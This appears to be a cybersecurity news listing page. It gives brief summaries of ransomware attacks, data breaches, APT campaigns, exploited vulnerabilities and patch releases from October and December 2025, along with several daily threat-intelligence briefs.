Crypto betting platform **[Shuffle.com](https://shuffle.com/)** has confirmed a significant data breach affecting a majority of its users. The incident occurred not on Shuffle's own systems, but at its third-party CRM provider, **Fast Track**. On October 10, Shuffle announced that attackers compromised Fast Track and gained access to a trove of sensitive user data. The exposed information includes full names, emails, phone numbers, home addresses, transaction histories, and, most critically, Know Your Customer (KYC) identity documents like passports and driver's licenses. While user funds and passwords are safe, the breach creates a severe risk of identity theft and targeted phishing for affected customers. Shuffle has revoked the provider's access and is urging users to enable 2FA.

Oct 10, 20255 min read

New 'White Lock' Ransomware Emerges, Demanding 4 Bitcoin and Threatening Data Leaks

A new ransomware strain named **White Lock** has been identified by cybersecurity researchers. Operating as a double-extortion threat, the malware first exfiltrates sensitive data before encrypting files on the victim's Windows system, appending the `.fbin` extension. A ransom note, `c0ntact.txt`, is dropped in each affected folder, demanding a payment of 4 Bitcoin within a stringent four-day deadline. The operators threaten to notify the victim's customers, sell the stolen data to competitors, and ultimately leak it publicly if the ransom is not paid. Victims are instructed to use the **[Tor](https://www.torproject.org/)** browser to communicate with the attackers, suggesting a focus on high-value enterprise targets.

Oct 10, 20255 min read

Humiliation for Pro-Russian Hackers 'TwoNet' After Attacking Decoy Water Utility Honeypot

The pro-Russian hacktivist group **TwoNet** has been publicly embarrassed after cybersecurity firm **[Forescout](https://www.forescout.com/)** revealed the group was duped into attacking a sophisticated decoy system. In September, TwoNet boasted on Telegram about disrupting a Dutch water utility's control systems. However, Forescout's research, published on October 10, confirmed the 'attack' was against one of their industrial control system (ICS) honeypots. The attacker, 'Barlati,' gained access using default credentials (`admin`/`admin`), defaced the HMI, and changed settings, believing it was a real facility. The incident highlights the naivety of some hacktivist groups and provides valuable intelligence on their TTPs against critical infrastructure.

Oct 10, 20255 min read

New Chinese APT 'Phantom Taurus' Targets Global Geopolitical Intel with 'NET-STAR' Malware

A newly designated, sophisticated threat group aligned with China, named **Phantom Taurus**, has been identified conducting long-term cyber-espionage campaigns. Active for over two years, the group targets government, military, and telecommunications organizations across Africa, the Middle East, and Asia. Its operations focus on strategic intelligence gathering that aligns with China's geopolitical interests. **Phantom Taurus** is distinguished by its stealth and use of a custom malware suite called **NET-STAR**, which targets **[Microsoft Internet Information Services (IIS)](https://www.iis.net/)** servers. While showing some infrastructure overlap with known APTs like **[APT27](https://attack.mitre.org/groups/G0045/)** and **[Mustang Panda](https://attack.mitre.org/groups/G0129/)**, its unique tools and TTPs mark it as a distinct and advanced threat.

Oct 10, 20256 min read

Killsec Ransomware Claims Attack on Indonesian FinTech WalletKu, Threatens to Leak KYC Data

The **Killsec** ransomware group has claimed responsibility for an attack on **WalletKu Indompet Indonesia**, a financial technology firm based in Jakarta. WalletKu provides a digital payment application primarily for micro, small, and medium enterprises. According to a post on an underground forum, Killsec has compromised the company and is threatening to release a significant amount of sensitive customer data. The exposed data reportedly includes Know Your Customer (KYC) information, such as full names, photos, government-issued IDs, and addresses. The attack highlights the growing trend of ransomware groups targeting FinTech companies, where the theft of KYC data poses a severe risk of identity theft and fraud for customers.

Oct 10, 20255 min read

'Datzbro' Android Trojan Targets Seniors in Global AI-Powered Facebook Scam

A global malicious campaign is using AI-generated content to create fake **[Facebook](https://www.facebook.com/)** groups that target seniors. The campaign, detailed in a CYFIRMA report, sets up convincing-looking communities for social events to lure victims into downloading a malicious Android application. This app is a potent banking trojan and spyware known as **Datzbro**. The malware can grant attackers full remote control of the device, enabling them to record audio and video, steal files, and use phishing overlays to capture banking credentials. The campaign has been observed targeting users in Australia, Canada, the UK, and Southeast Asia. The threat is amplified by the fact that the builder for the Datzbro trojan was previously leaked online, allowing any criminal to use it.

Oct 10, 20255 min read

Perfect 10.0 CVSS Flaw in GoAnywhere MFT Exploited by Medusa Ransomware Group

Microsoft has linked the cybercrime group Storm-1175, known for deploying Medusa ransomware, to the active exploitation of a critical vulnerability in Fortra's GoAnywhere Managed File Transfer (MFT) solution. The flaw, CVE-2025-10035, is an unauthenticated remote code execution vulnerability with a perfect 10.0 CVSS score. Storm-1175 has been exploiting this zero-day since at least September 11, 2025, to compromise organizations in finance, healthcare, and technology, deploying backdoors and RMM tools before exfiltrating data and deploying ransomware.

Oct 9, 20255 min read

Phishing Campaign Lures Marketing Professionals with Fake Jobs at Tesla, Google

Security firm Cofense has detailed a sophisticated phishing campaign that targets marketing and social media professionals with fake job opportunities from high-profile brands like Tesla, Google, Ferrari, and Red Bull. The campaign uses realistic emails and multi-step credential harvesting portals to trick victims. Unlike typical phishing attacks, the primary goal is to collect detailed resumes and other personally identifiable information (PII). This data can then be used by threat actors to craft more convincing social engineering attacks, bypass security questions, or commit identity theft.

Oct 9, 20254 min read

Financial Firms Tie CEO Pay to Cyber Performance Amid Budget Hikes, Moody's Finds

A new report from Moody's indicates a significant shift in how financial and insurance firms are managing cyber risk. Companies are increasing cybersecurity spending, with nearly half dedicating 8% or more of their IT budget to cyber. Governance is also strengthening, as 40% of firms now link CEO compensation directly to cybersecurity performance, up from 24% in 2023. Furthermore, CISO briefings to the board are becoming more frequent, and firms are maturing their operational readiness with annual incident response tests and daily data backups.

Oct 9, 20253 min read

Expert Advice on Securing Critical Infrastructure with Limited Budgets

In a recent podcast, cybersecurity expert Chetrice Romero from Ice Miller provided guidance for leaders responsible for protecting critical infrastructure, particularly those facing limited budgets. The discussion covered common cyber and physical threats to utilities, the need for scalable and resilient strategies, and practical advice for maximizing security investments. Key recommendations included embracing cloud-native platforms for efficiency and designing future-proof command centers, offering actionable insights for securing essential systems in a challenging economic environment.

Oct 9, 20253 min read

Clop Exploits Critical Oracle Zero-Day; CISA Issues Emergency Patch Directive

Multiple international cybersecurity agencies, including CISA, the UK's NCSC, and Singapore's CSA, have issued urgent warnings about a critical zero-day vulnerability, CVE-2025-61882, in Oracle E-Business Suite. The flaw, which has a CVSS score of 9.8, is being actively exploited by the Clop ransomware group in a campaign that began in August 2025. The attackers are leveraging the vulnerability to exfiltrate corporate data and are now sending extortion emails to executives of victim organizations. CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by October 28, 2025, highlighting the extreme risk posed by this unauthenticated remote code execution flaw.

Oct 8, 20255 min read

Qilin Ransomware Claims Disruptive Attack on Japanese Beverage Giant Asahi

The Russia-based Qilin ransomware group has claimed responsibility for a significant cyberattack against Asahi Group Holdings, one of Japan's largest beverage companies. The attack, first disclosed in late September 2025, caused major operational disruptions, forcing the suspension of order and shipment systems. On October 7, Qilin added Asahi to its data leak site, alleging the theft of 27 gigabytes of sensitive data, including contracts and employee information. Asahi is still working to restore its systems, highlighting the vulnerability of manufacturing and supply chain operations to ransomware.

Oct 8, 20254 min read

Microsoft Warns of Attackers Abusing Teams for Session Hijacking

Microsoft has issued a warning about a threat actor group, tracked as Storm-2372, that is abusing legitimate Microsoft Teams features for cyberattacks. In a report on October 7, 2025, Microsoft detailed how the group uses social engineering within Teams chats and file sharing to deliver malware, trick users into fraudulent authentication flows, and ultimately steal access tokens to hijack user sessions. The attacks are effective because they originate from within the trusted Teams environment, making users more likely to fall for the lures.

Oct 8, 20254 min read

Red Hat Consulting GitLab Breached; ShinyHunters Leaks Sensitive Client Data

Red Hat has confirmed a security breach affecting an internal GitLab server used by its consulting division. A group named 'Crimson Collective,' in collaboration with the notorious extortion group 'ShinyHunters,' claims to have stolen 570GB of data from over 28,000 repositories. The stolen data allegedly includes highly sensitive 'Customer Engagement Reports' containing network diagrams, configurations, and access details for over 800 organizations, including Bank of America, Verizon, and the U.S. National Security Agency. While Red Hat states the breach was contained and did not impact its product supply chain, the incident represents a massive supply chain risk for its clients.

Oct 8, 20255 min read

Methodist Homes Discloses Healthcare Data Breach Affecting Nearly 26,000

Methodist Homes of Alabama & Northwest Florida, a senior living and healthcare provider, announced on October 8, 2025, that it suffered a data breach affecting 25,579 individuals. The incident, which occurred over a 12-day period in October 2024, resulted in unauthorized access to sensitive personal and protected health information (PHI). The compromised data includes names, Social Security numbers, driver's license numbers, and detailed clinical information. The organization's disclosure comes nearly a year after the initial detection of the breach.

Oct 8, 20254 min read

Critical RCE Flaw (CVE-2025-53967) Patched in Figma AI Tool

A high-severity command injection vulnerability, CVE-2025-53967, has been discovered and patched in the 'figma-developer-mcp' Model Context Protocol server, a tool used with the Figma design platform. The flaw, rated with a CVSS score of 7.5, could allow an unauthenticated attacker to achieve remote code execution (RCE) on a server running the tool. The vulnerability, discovered by Imperva, stemmed from the unsanitized use of user input in command-line strings. Users are urged to update to the patched version to mitigate the risk of server compromise.

Oct 8, 20254 min read

Google Rolls Out October 2025 Security Update for Pixel Devices

Google has released its scheduled October 2025 security update for all supported Pixel devices. The update, detailed in the Pixel Update Bulletin on October 8, 2025, addresses numerous security vulnerabilities. It incorporates all patches from the broader October 2025 Android Security Bulletin, along with additional fixes for flaws specific to Pixel hardware components. Google urges all Pixel users to accept the over-the-air (OTA) update to protect their devices from potential exploitation.

Oct 8, 20253 min read

Atos Partners with Qevlar AI to Deploy "Virtual SOC Analyst"

On October 7, 2025, the global digital transformation and cybersecurity firm Atos announced a strategic partnership with Qevlar AI. The collaboration will integrate Qevlar's 'Virtual SOC Analyst,' an agentic AI technology, into Atos's global network of 17 Security Operations Centers (SOCs). The goal is to automate routine and intermediate security alert investigations, allowing Atos's human analysts to focus on more complex tasks like proactive threat hunting. The partnership aims to enhance operational efficiency for Atos's 2,000+ managed security customers.

Oct 8, 20253 min read

SonicWall Breach Escalates: 100% of Cloud Backups Confirmed Stolen

Firewall vendor SonicWall has dramatically escalated the severity of a recent data breach, confirming that an investigation found that 100% of customers using its cloud backup service had their firewall configuration files stolen. This admission, made on October 6, 2025, after an investigation with Mandiant, starkly contrasts with the company's initial September statement that only 5% of its user base was affected. The stolen files, accessed via the MySonicWall portal, contain sensitive network architecture details and encrypted credentials, posing a significant reconnaissance risk for future attacks against all affected customers.

Oct 8, 20255 min read

New 'Scattered Lapsus$ Hunters' Gang Extorts 39 Salesforce Customers on Leak Site

A new cybercriminal collective calling itself 'Scattered Lapsus$ Hunters' has emerged, claiming to be a merger of members from Scattered Spider, Lapsus$, and ShinyHunters. The group launched a dark web data leak site over the weekend of October 4-5, listing 39 major companies, including Cisco, Toyota, and Marriott, as victims of a massive data breach affecting their Salesforce instances. The actors claim to have exfiltrated nearly one billion records and have set an October 10 deadline for ransoms to be paid. In an unusual tactic, they have also demanded that Salesforce pay a ransom to spare the listed victims, threatening to release documents proving alleged security negligence. The breaches are suspected to have originated from vishing attacks targeting IT help desks.

Oct 8, 20255 min read

CISA Adds Actively Exploited Zimbra XSS Zero-Day (CVE-2025-27915) to KEV Catalog

On October 7, 2025, CISA added CVE-2025-27915, a high-severity zero-day vulnerability in the Zimbra Collaboration Suite (ZCS), to its Known Exploited Vulnerabilities (KEV) catalog. The flaw is a stored cross-site scripting (XSS) issue in the ZCS Classic Web Client that can be triggered with no user interaction beyond viewing a malicious email. An attacker can craft a malicious iCalendar invitation that, when processed, executes arbitrary JavaScript in the victim's authenticated session. This allows for account takeover, data exfiltration, and redirection of sensitive emails. Federal agencies are mandated to apply mitigations by October 28, 2025.

Oct 8, 20254 min read

Signal Threatens to Exit EU Market if "Chat Control" Mass Surveillance Bill Passes

Meredith Whittaker, the president of the Signal Foundation, has declared that the encrypted messaging service will withdraw from the European Union if the controversial 'Chat Control' legislation is enacted. The proposed law, which faces a critical vote on October 14, would mandate that communication platforms like Signal and WhatsApp scan all user content, including private messages and photos, for illicit material before it is encrypted. Critics, including Signal, argue this would create a backdoor for mass surveillance, fundamentally break end-to-end encryption, and create a dangerous cybersecurity precedent. The statement is a direct appeal to EU member states, particularly Germany, to vote against the measure.

Oct 7, 20254 min read

CISA Warns of Actively Exploited Windows Privilege Escalation Flaw (CVE-2021-43226)

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2021-43226, a high-severity privilege escalation vulnerability in the Microsoft Windows Common Log File System (CLFS) Driver, to its Known Exploited Vulnerabilities (KEV) catalog. The action, taken on October 6, 2025, confirms the flaw is being actively exploited in the wild. The vulnerability allows a local, authenticated attacker to execute code with SYSTEM-level privileges by leveraging a buffer overflow. The flaw affects a wide range of Windows versions, including Windows 10, 11, and Server editions. Federal agencies have been directed to patch the vulnerability by October 27, 2025.

Oct 7, 20254 min read

Jaguar Land Rover Begins Phased Restart a Month After Crippling Cyberattack

On October 7, 2025, Jaguar Land Rover (JLR) announced it is beginning a phased restart of its manufacturing plants, more than a month after a major cyberattack on August 31 halted its global operations. The attack disrupted everything from production lines and parts flow to retail systems. The restart is beginning cautiously, with engine plants and stamping operations coming online first, and full production is hoped for by the end of October. The incident has caused a significant financial blow, with sales dropping sharply in all markets. In response to the crisis, JLR has also launched a new financing program to support its struggling suppliers who have lost weeks of orders.

Oct 7, 20255 min read

AI Risk Disclosures Skyrocket Among S&P 500, Cybersecurity a Top Concern

A new report from The Conference Board, released on October 7, 2025, reveals a dramatic shift in corporate risk perception, with over 70% of S&P 500 companies now formally disclosing AI-related risks in their public filings. This is a massive jump from just 12% in 2023. Reputational damage is the most cited concern (38%), followed closely by cybersecurity risks (20%). Companies are increasingly worried about how AI expands the attack surface, introduces new vulnerabilities through third-party tools, and creates new legal and regulatory challenges. The findings highlight that while AI adoption is accelerating, corporate governance and oversight are still struggling to keep pace.

Oct 7, 20254 min read

Redis Patches Critical "RediShell" RCE Flaw (CVE-2025-49844) in Lua Sandbox

Redis has released patches for CVE-2025-49844, a critical use-after-free vulnerability nicknamed "RediShell" by the Wiz researchers who discovered it. The flaw, announced on October 7, 2025, allows an authenticated attacker to escape the Lua sandbox and achieve remote code execution (RCE) on the underlying server. The risk is especially high for the estimated 330,000 internet-exposed Redis instances, around 60,000 of which are believed to have no authentication enabled. Because official Redis container images disable authentication by default, these instances are vulnerable to unauthenticated RCE. Security agencies like Germany's BSI are warning of imminent exploitation.

Oct 7, 20255 min read

Digicloud Africa to Distribute Google's AI-Powered SecOps Platform Across Continent

Digicloud Africa, a major Google Cloud distributor, announced on October 6, 2025, that it has partnered with Google Security Operations. This collaboration will make Google's advanced, AI-driven cybersecurity solutions, including its cloud-native SIEM and SOAR platform, available to enterprises and organizations across the African continent. The partnership aims to help African businesses modernize their security posture, moving from reactive to proactive, intelligence-driven defense strategies to combat the growing complexity of cyber threats in the region.

Oct 7, 20253 min read

CISA Warns of Widespread Flaws in Industrial Control Systems from Major Vendors

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a series of advisories warning of numerous vulnerabilities in Industrial Control Systems (ICS) from prominent vendors, including Rockwell Automation, Hitachi Energy, Mitsubishi Electric, and Delta Electronics. These flaws affect products widely deployed in the energy sector and other critical infrastructure domains. CISA is urging administrators to review the advisories and apply patches and mitigations immediately to prevent potential exploitation that could lead to operational disruptions or cyberattacks against critical national infrastructure.

Oct 6, 20254 min read

Microsoft Patches 3 Zero-Days Under Active Attack in Massive October Update

Microsoft has released its October 2025 Patch Tuesday update, a colossal release addressing 175 security flaws across its product suite. The update is highlighted by emergency patches for three zero-day vulnerabilities confirmed to be actively exploited in the wild. These critical flaws, now added to CISA's KEV catalog, include two privilege escalation bugs in Windows components (CVE-2025-59230 and CVE-2025-24990) and a Secure Boot bypass (CVE-2025-47827). The update also fixes a critical 9.8 CVSS RCE vulnerability in WSUS (CVE-2025-59287), posing a significant supply-chain risk. Administrators are urged to apply these updates immediately to mitigate active threats.

Oct 6, 20255 min read

Chinese APT Flax Typhoon Weaponizes ArcGIS Server as Persistent Backdoor in Year-Long Spy Campaign

The China-linked threat group Flax Typhoon (also known as Ethereal Panda) conducted a sophisticated, year-long espionage campaign against a government agency by compromising an Esri ArcGIS server. According to researchers at ReliaQuest, the attackers modified a legitimate Java server object extension (SOE) to create a persistent web shell. This backdoor, combined with extensive use of living-off-the-land techniques like PowerShell and a renamed SoftEther VPN client, allowed the APT group to maintain long-term access, move laterally, and harvest credentials while evading detection by hiding within legitimate server traffic.

Oct 6, 20255 min read

Qilin Ransomware Cripples Asahi Breweries, Demands $10 Million Ransom

The Qilin ransomware group has claimed responsibility for a devastating cyberattack against Asahi Group Holdings, one of Japan's largest beverage companies. The attack, which occurred in late September, forced the company to halt production at 30 factories and suspend shipments, leading to significant operational and financial disruption. The threat actors are now reportedly demanding a $10 million ransom to prevent the public release of exfiltrated company data, employing a classic double extortion tactic. The incident highlights the increasing trend of ransomware gangs targeting the manufacturing sector to maximize impact and pressure victims into paying large ransoms.

Oct 6, 20255 min read

Phishing Campaign Abuses NPM and UNPKG CDN to Steal Credentials

A sophisticated phishing campaign, dubbed "Beamglea," is abusing the public NPM registry and the trusted unpkg.com CDN to host and deliver credential-stealing malware. Researchers at Socket discovered over 175 malicious, disposable NPM packages created solely to serve a malicious JavaScript file. Attackers send HTML lures to victims that load the script from the reputable unpkg.com domain, bypassing traditional domain-based security filters. This technique, which has targeted over 135 organizations in Europe, represents a dangerous evolution in supply chain abuse, turning developer infrastructure into a tool for direct phishing attacks.

Oct 6, 20254 min read

G7 Cyber Experts Issue Statement on Managing AI Risks in Financial Sector

The G7 Cyber Expert Group (CEG) has issued a formal statement on the cybersecurity implications of Artificial Intelligence (AI) within the financial sector. Released on October 6, 2025, the document highlights the dual nature of AI, acknowledging its potential to bolster cyber defenses while also warning that it can amplify existing threats and introduce new vulnerabilities. The G7 CEG urges financial institutions and regulators to proactively develop robust governance and risk management frameworks to ensure the secure and resilient adoption of AI, promoting collaboration to establish global best practices.

Oct 6, 20254 min read

"Maverick": New Banking Trojan Spreads via WhatsApp in Brazil

A new and sophisticated fileless banking Trojan named "Maverick" is spreading rapidly in Brazil through a large-scale WhatsApp campaign. According to Kaspersky researchers, the malware is delivered via ZIP archives containing malicious LNK files, a method that bypasses the platform's file-blocking. Maverick operates entirely in memory to evade detection, using PowerShell and encrypted shellcode to steal credentials for 26 Brazilian banks and multiple cryptocurrency exchanges. The Trojan also features a worm-like self-propagation mechanism, hijacking the victim's WhatsApp Web session to automatically send the malicious payload to all their contacts.

Oct 6, 20255 min read

Intelligence Publications

Microsoft Patches Actively Exploited Zero-Day as Phishing and Malware Tactics Evolve

This cybersecurity brief for December 18, 2025, covers several critical developments. The most urgent is Microsoft's final Patch Tuesday of the year, which addresses an actively exploited zero-day (CVE-2025-62221) in Windows, prompting a CISA directive. Concurrently, threat actors are escalating phishing campaigns against Microsoft 365 using OAuth device code abuse. Other significant events include the discovery of the 'GhostPoster' malware in Firefox add-ons, the emergence of AI-powered ransomware like 'PromptLock', and an investigation by Google into malicious code found within its search infrastructure.

Dec 17, 20257 articles

Critical React2Shell Flaw Under Widespread Attack, CISA Warns of Fortinet Exploit, and AI Fuels Cloud Risk

This cybersecurity brief for December 17, 2025, covers a surge in critical vulnerability exploitation. A CVSS 10.0 flaw in React, dubbed 'React2Shell,' is being widely abused by both state actors and cybercriminals to deploy backdoors and miners. CISA has added a critical, actively exploited Fortinet SSO vulnerability to its KEV catalog. Meanwhile, a new Palo Alto Networks report reveals that rapid AI adoption is massively expanding the cloud attack surface, with 99% of organizations reporting attacks on their AI systems. Other major events include a cyberattack on the French Interior Ministry, a novel 'ConsentFix' phishing technique bypassing MFA to hijack Microsoft accounts, and a large-scale malware alert in New Zealand for Lumma Stealer infections.

Dec 16, 20257 articles

Massive Financial Breaches Expose 18M+; Apple & Google Patch Actively Exploited Zero-Days

This cybersecurity brief for December 16, 2025, covers a series of critical incidents. Major data breaches at financial firms 700Credit and Prosper Marketplace have exposed the sensitive information of over 18 million individuals. Concurrently, Apple and Google rushed to patch two actively exploited zero-day vulnerabilities in the WebKit engine. Other significant events include CISA's mandate to patch a critical GeoServer flaw, active attacks on Fortinet SSO vulnerabilities, and data exposures at SoundCloud and Pornhub. Ransomware continues to plague the healthcare sector with an attack on Fieldtex by the Akira group, while new malware campaigns target developers on GitHub.

Dec 15, 20255 articles

Massive Data Breaches Expose Billions, as Critical Zero-Days in Apple and Google Products See Active Exploitation

This cybersecurity brief for December 15, 2025, covers a series of high-impact incidents. A colossal 16TB unsecured MongoDB database exposed 4.3 billion professional records, creating a massive risk for social engineering. Concurrently, a data breach at fintech firm 700Credit impacted 5.6 million individuals, exposing sensitive PII including Social Security numbers. Tech giants Apple and Google are racing to patch actively exploited zero-day vulnerabilities, with CISA adding one to its KEV catalog. Other critical threats include a newly discovered ransomware group named 'Gentlemen', an actively exploited flaw in Sierra Wireless routers affecting critical infrastructure, and a CVSS 10.0 vulnerability in an Apache Tika dependency impacting numerous Atlassian products.

Dec 14, 20257 articles

Apple Patches Actively Exploited Zero-Days; CISA Warns of Critical Router Flaw Amidst Ransomware Surge

In the period covering December 13-14, 2025, the cybersecurity landscape was dominated by critical vulnerability disclosures and active exploitation campaigns. Apple released an emergency patch for two zero-day flaws in iOS being used in targeted spyware attacks. CISA added a high-severity RCE vulnerability in Sierra Wireless routers to its KEV catalog. Meanwhile, ransomware groups KillSec and Qilin continued their global extortion campaigns, and several major data breaches came to light, including a massive 16TB database exposing 4.3 billion records and a breach at Canadian airline WestJet affecting 1.2 million passengers.

Dec 13, 20258 articles

React2Shell Ignites Global Exploitation Frenzy; Microsoft Patches Actively Exploited Zero-Day

This cybersecurity brief for December 13, 2025, covers a critical period marked by widespread, active exploitation of the 'React2Shell' vulnerability (CVE-2025-55182) by both criminal and state-sponsored actors, prompting urgent CISA directives. Concurrently, Microsoft's December Patch Tuesday addressed 57 flaws, including an actively exploited Windows zero-day (CVE-2025-62221). Other major incidents include a new Chrome zero-day on macOS, an unpatched zero-day in the Gogs Git service, a major npm supply chain attack by the 'Shai-Hulud 2.0' worm, and new campaigns from the Makop ransomware group and the Hamas-linked WIRTE APT.

Dec 12, 20255 articles

Microsoft and Google Patch Actively Exploited Zero-Days Amidst Major Healthcare Breaches and Sophisticated Supply Chain Attacks

In the 24-hour period ending December 12, 2025, the cybersecurity landscape was dominated by the urgent patching of actively exploited zero-day vulnerabilities by both Microsoft and Google. Microsoft's December Patch Tuesday addressed a critical privilege escalation flaw (CVE-2025-62221) already in use by attackers, while Google rushed out an emergency fix for its eighth Chrome zero-day this year. The healthcare sector remains under siege, with massive data breaches at Conduent and TriZetto Provider Solutions coming to light, affecting millions. Concurrently, new intelligence revealed sophisticated threats, including the "Shai-Hulud 2.0" supply chain worm, an espionage campaign by the Hamas-affiliated "Ashen Lepus" group, and a novel hardware attack named "Battering RAM" capable of breaking CPU security protections.

Dec 11, 20254 articles

Microsoft Patches Actively Exploited Zero-Day as Gogs Git Service Reels from Unpatched Flaw

In cybersecurity news for December 11, 2025, Microsoft issued its final Patch Tuesday of the year, addressing an actively exploited privilege escalation zero-day (CVE-2025-62221) in Windows. Concurrently, an unpatched zero-day (CVE-2025-8110) in the Gogs Git service is under active attack, compromising hundreds of instances. New malware threats emerged with 'DroidLock' targeting Android devices and the 'AshTag' suite used by the Ashen Lepus APT against Middle Eastern governments. Other significant developments include new vulnerabilities in React, sophisticated social engineering tactics detailed by HP, and an espionage campaign, 'Operation DupeHike,' targeting Russian corporations.

Dec 10, 20258 articles

React2Shell Mass Exploitation, Microsoft Zero-Day Patch, and NPM Supply Chain Chaos Dominate Threat Landscape

This cybersecurity brief for December 10, 2025, covers a period of intense activity, headlined by the widespread, multi-actor exploitation of the critical 'React2Shell' RCE vulnerability (CVE-2025-55182). Other major events include Microsoft's December Patch Tuesday addressing an actively exploited Windows zero-day, a massive NPM supply chain attack dubbed 'Shai-Hulud 2.0' that exfiltrated over 400,000 secrets, and a reported 700% surge in ransomware attacks targeting hypervisor infrastructure. The landscape is further marked by warnings of pro-Russian hacktivists targeting industrial systems and several large-scale data breaches.

Dec 9, 20253 articles

Global Patching Scramble as Critical "React2Shell" RCE Vulnerability Sees Widespread Exploitation

This cybersecurity brief for December 9, 2025, covers a critical unauthenticated RCE vulnerability, dubbed "React2Shell" (CVE-2025-55182), affecting React Server Components and now under active exploitation by multiple threat actors, including state-sponsored groups. Other major developments include the DeadLock ransomware using a novel "Bring Your Own Vulnerable Driver" technique to disable EDRs, the evolution of IAB Storm-0249's tactics, and a new "code-to-cloud" attack vector abusing leaked GitHub Personal Access Tokens. The brief details these threats, provides technical analysis, and offers actionable mitigation strategies for defenders.

Dec 8, 20258 articles

React2Shell Mass Exploitation: Critical RCE Flaw Hits Web, as Android Zero-Days and FinCEN Report Highlight Escalating Threats

This cybersecurity brief for December 8, 2025, covers a period of intense activity, headlined by the mass exploitation of 'React2Shell' (CVE-2025-55182), a critical 10.0 CVSS RCE vulnerability in React Server Components targeted by Chinese APTs. Other major events include Google's patch for two actively exploited Android zero-days, a FinCEN report revealing over $2.1 billion in ransomware payments since 2022, and significant data breaches at universities and financial service providers linked to Cl0p and Akira ransomware gangs. The landscape is further defined by new malware threats like the BRICKSTORM backdoor and Albiriox Android trojan, and a White House executive order accelerating the transition to post-quantum cryptography.

Dec 7, 20255 articles

React2Shell Exploitation Surges as CISA Adds to KEV; Clop Hits NHS via Oracle Zero-Day

This cybersecurity brief for December 7, 2025, covers a critical period marked by the widespread, active exploitation of the React2Shell vulnerability (CVE-2025-55182), prompting its addition to CISA's KEV catalog. State-sponsored actors and cybercriminals are leveraging the flaw for broad attacks. Concurrently, the Clop ransomware group executed a significant data breach against the UK's Barts Health NHS Trust by exploiting an Oracle zero-day. Other major developments include the discovery of long-running supply chain attacks in Go and Rust package registries, a joint US-Canada warning about Chinese 'Brickstorm' malware targeting VMware, and a no-click vulnerability in WhatsApp leading to account takeovers. These events underscore the increasing sophistication of threats against software supply chains, critical infrastructure, and widely used applications.

Dec 6, 20257 articles

React2Shell Zero-Day Exploited by Chinese APTs, Triggers Global Cloudflare Outage; FinCEN Reports Ransomware Payments Top $2.1B

This cybersecurity brief for December 6, 2025, covers a critical 24-hour period dominated by the active exploitation of the React2Shell vulnerability (CVE-2025-55182). Chinese state-sponsored actors weaponized the CVSS 10.0 flaw within hours, prompting CISA to add it to the KEV catalog. The rush to mitigate the threat inadvertently caused a major global outage at Cloudflare. Concurrently, a new FinCEN report revealed ransomware payments have surpassed $2.1 billion in three years, highlighting the persistent financial drain of cybercrime. Other significant developments include the emergence of the Benzona ransomware, the Albiriox Android RAT, and a new cybercrime supergroup, 'Scattered LAPSUS$ Hunters,' threatening Salesforce data.

Dec 5, 20254 articles

Critical 'React2Shell' RCE Exploited by Chinese Hackers; Google Patches Android Zero-Days

This cybersecurity brief for December 5, 2025, covers a critical 10.0 CVSS vulnerability dubbed 'React2Shell' (CVE-2025-55182) being actively exploited by Chinese state-sponsored actors just hours after disclosure. Other major incidents include Google patching two actively exploited Android zero-days, a joint US-Canada alert on new 'BRICKSTORM' malware targeting VMware, and the Clop ransomware group breaching a major UK NHS trust.

Dec 4, 20255 articles

Critical 'React2Shell' RCE Threatens Web Ecosystem as CISA Warns of Chinese 'BRICKSTORM' Malware Targeting Governments

This cybersecurity brief for December 4, 2025, covers a critical 10.0 CVSS RCE vulnerability, 'React2Shell' (CVE-2025-55182), affecting React and Next.js, now under active exploitation. Concurrently, a joint advisory from CISA, NSA, and Canada's Cyber Centre details the sophisticated 'BRICKSTORM' backdoor used by PRC state-sponsored actors against government and IT sectors. Other major developments include CISA adding actively exploited Android and SCADA vulnerabilities to its KEV catalog, a FinCEN report revealing over $2.1 billion in ransomware payments since 2022, and a significant data breach disclosure from Freedom Mobile.

Dec 3, 20257 articles

Android Zero-Days & Critical React RCE Exploited in Wild; Coupang Breach Hits 34M

This cybersecurity brief for December 3, 2025, covers a series of critical incidents, including the active exploitation of two Android zero-day vulnerabilities and a perfect 10.0 CVSS score RCE flaw in React and Next.js. A massive data breach at South Korean e-commerce giant Coupang exposed the data of nearly 34 million customers due to a compromised employee key. Other major developments include a supply-chain attack on the SmartTube app, new stealthy tactics from Iranian APT MuddyWater, a shift to data extortion by ransomware groups targeting manufacturing, and significant policy updates from the G7 and EU.

Dec 2, 20255 articles

Massive Data Breaches, Android Zero-Days, and APT Activity Mark a Turbulent Start to December

This cybersecurity brief for December 2, 2025, covers a series of high-impact incidents. Key stories include a supply chain attack on the popular SmartTube app for Android TV, a monumental data breach at South Korean e-commerce giant Coupang affecting 33.7 million users, and Google's emergency patch for two actively exploited Android zero-day vulnerabilities. Additionally, law enforcement dismantled a major crypto-laundering service, and new campaigns from Iranian and North Korean APT groups targeting critical infrastructure and financial sectors have been detailed.

Dec 1, 20257 articles

Coupang Data Breach Exposes 33.7M Users; Google Patches Actively Exploited Android Zero-Days

This cybersecurity brief for December 1, 2025, covers several critical incidents. The most prominent is a massive data breach at South Korean e-commerce giant Coupang, affecting 33.7 million users due to an authentication vulnerability. Concurrently, Google released an urgent Android update patching 107 flaws, including two zero-days under active exploitation. Other major events include the release of a proof-of-concept for a critical zero-click Outlook RCE, ongoing supply chain attacks from the Shai-Hulud 2.0 worm, and new intelligence on APT groups like Tomiris and those targeting industrial sectors.

Nov 30, 20257 articles

Supply Chain Under Siege: Malicious VS Code Extension, APT36 Linux Malware, and Major Data Breaches Rattle Global Industries

This cybersecurity brief for November 29-30, 2025, covers a series of high-impact incidents, led by the discovery of a malicious Visual Studio Code extension that infected over 16,000 developers using a sophisticated Solana blockchain-based C2. Concurrently, the APT36 threat actor escalated its cyber-espionage efforts by deploying custom Linux malware against Indian government entities. The period also saw major data breaches, including the exposure of Amazon data center blueprints from a steel contractor and the theft of 6.1 million Netmarble user records. In the financial sector, a DeFi exploit drained $9 million from Yearn Finance, while regulatory actions saw Comcast fined $1.5 million for a vendor-related breach, underscoring the pervasive risk across software development, government, and corporate supply chains.

Nov 29, 20258 articles

Qilin Ransomware Strikes Globally: Asahi and South Korean Financial Sector Hit in Major Campaigns

